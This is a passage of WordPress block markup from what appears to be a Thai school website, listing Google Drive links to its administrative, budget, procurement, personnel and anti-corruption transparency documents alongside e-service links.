class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":754,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/11/560432794_122252459414202781_8219191812793928684_n-1024x726.jpg\" alt=\"\" class=\"wp-image-754\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:gallery {\"ids\":[260],\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":757,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/11/572095115_122254848554202781_886880693938319365_n-1-1024x538.jpg\" alt=\"\" class=\"wp-image-757\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5} -->\n<h5 class=\"wp-block-heading has-text-align-center\"><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนปฏิบัติการประจำปีการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5,\"align\":\"full\"} -->\n<h5 class=\"wp-block-heading alignfull has-text-align-center\"><a href=\"https://drive.google.com/file/d/1q0z8a2Mbu3x-c8vLwrElwX6v8BJY7jtB/view?usp=sharing\">แผนพัฒนาการจัดการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3298cf22\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"ea4e4ab8\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=sharing\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1AeKeechkWj0RdYe5xvMgrFXsQiTu26xV/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} 